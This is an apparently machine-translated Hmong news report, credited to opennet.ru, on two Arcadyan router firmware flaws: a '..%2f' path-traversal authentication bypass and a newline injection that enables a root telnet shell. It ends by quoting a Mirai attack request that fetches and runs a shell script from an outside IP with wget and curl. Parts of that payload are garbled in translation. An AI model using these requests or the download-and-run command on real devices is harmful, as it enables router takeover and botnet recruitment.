Kev tawm tsam loj tau raug kaw hauv lub network tawm tsam cov routers hauv tsev uas nws cov firmware siv HTTP server siv los ntawm lub tuam txhab Arcadyan. Txhawm rau kom tau txais kev tswj hwm ntawm cov khoom siv, kev sib xyaw ua ke ntawm ob qhov tsis zoo yog siv uas tso cai rau kev tua cov chaw taws teeb ntawm arbitrary code nrog cov cai hauv paus. Qhov teeb meem cuam tshuam rau ntau yam ntawm ADSL routers los ntawm Arcadyan, ASUS thiab Buffalo, nrog rau cov khoom siv hauv qab Beeline hom (qhov teeb meem tau lees paub hauv Smart Box Flash), Deutsche Telekom, Txiv kab ntxwv, O2, Telus, Verizon, Vodafone thiab. lwm tus neeg siv xov tooj. Nws tau raug sau tseg tias qhov teeb meem tau tshwm sim hauv Arcadyan firmware rau ntau tshaj 10 xyoo thiab lub sijhawm no tau tswj hwm kev tsiv mus rau yam tsawg kawg 20 ntaus qauv los ntawm 17 cov tuam txhab sib txawv.
Thawj qhov tsis zoo, CVE-2021-20090, ua rau nws muaj peev xwm nkag mus rau txhua qhov web interface tsab ntawv yam tsis muaj kev lees paub. Lub ntsiab ntawm qhov tsis zoo yog tias nyob rau hauv lub vev xaib interface, qee cov npe los ntawm cov duab, CSS cov ntaub ntawv thiab JavaScript scripts raug xa mus tau yam tsis muaj kev lees paub. Hauv qhov no, cov npe uas nkag mus yam tsis muaj kev lees paub raug tso cai raug kuaj xyuas siv lub ntsej muag thawj zaug. Qhia meej "../" cov cim nyob rau hauv txoj kev mus rau cov niam txiv cov npe raug thaiv los ntawm lub firmware, tab sis siv cov "..% 2f" ua ke yog hla. Yog li, nws muaj peev xwm qhib cov nplooj ntawv tiv thaiv thaum xa cov lus thov xws li "http://192.168.1.1/images/..%2findex.htm".
Qhov thib ob qhov tsis zoo, CVE-2021-20091, tso cai rau tus neeg siv cov ntaub ntawv pov thawj los hloov pauv cov txheej txheem kev teeb tsa ntawm lub cuab yeej los ntawm kev xa cov ntawv tshwj xeeb uas tau teev tseg rau hauv tsab ntawv apply_abstract.cgi, uas tsis kuaj xyuas qhov muaj tus cim tshiab hauv qhov tsis muaj. . Piv txwv li, thaum ua haujlwm ping, tus neeg tawm tsam tuaj yeem qhia tus nqi "192.168.1.2% 0AARC_SYS_TelnetdEnable=1" hauv thaj teb nrog tus IP chaw nyob raug kuaj, thiab tsab ntawv, thaum tsim cov ntaub ntawv chaw /tmp/etc/config/ .glbcfg, yuav sau cov kab "AARC_SYS_TelnetdEnable=1" rau hauv nws ", uas qhib lub telnetd server, uas muab cov lus txib tsis txwv lub plhaub nkag nrog cov cai hauv paus. Ib yam li ntawd, los ntawm kev teeb tsa AARC_SYS parameter, koj tuaj yeem ua tiav cov cai ntawm lub kaw lus. Thawj qhov tsis zoo ua rau nws tuaj yeem khiav cov ntawv teeb meem yam tsis muaj kev lees paub los ntawm kev nkag mus rau nws li β/images/..%2fapply_abstract.cgiβ.
Txhawm rau siv qhov tsis zoo, tus neeg tawm tsam yuav tsum tuaj yeem xa daim ntawv thov mus rau qhov chaw nres nkoj network uas lub vev xaib cuam tshuam tau ua haujlwm. Kev txiav txim siab los ntawm qhov muaj zog ntawm kev sib kis ntawm kev tawm tsam, ntau tus neeg ua haujlwm tawm hauv lawv cov khoom siv los ntawm lub network sab nraud kom yooj yim rau kev kuaj mob ntawm cov teeb meem los ntawm kev pab cuam. Yog tias nkag mus rau lub interface tsuas yog txwv rau hauv lub network sab hauv, kev tawm tsam tuaj yeem nqa tawm los ntawm lwm lub network siv "DNS rebinding" txheej txheem. Vulnerabilities twb tau nquag siv los txuas routers rau Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Kev sib txuas: kaw Tus Neeg Siv-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping.212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Tau qhov twg los: opennet.ru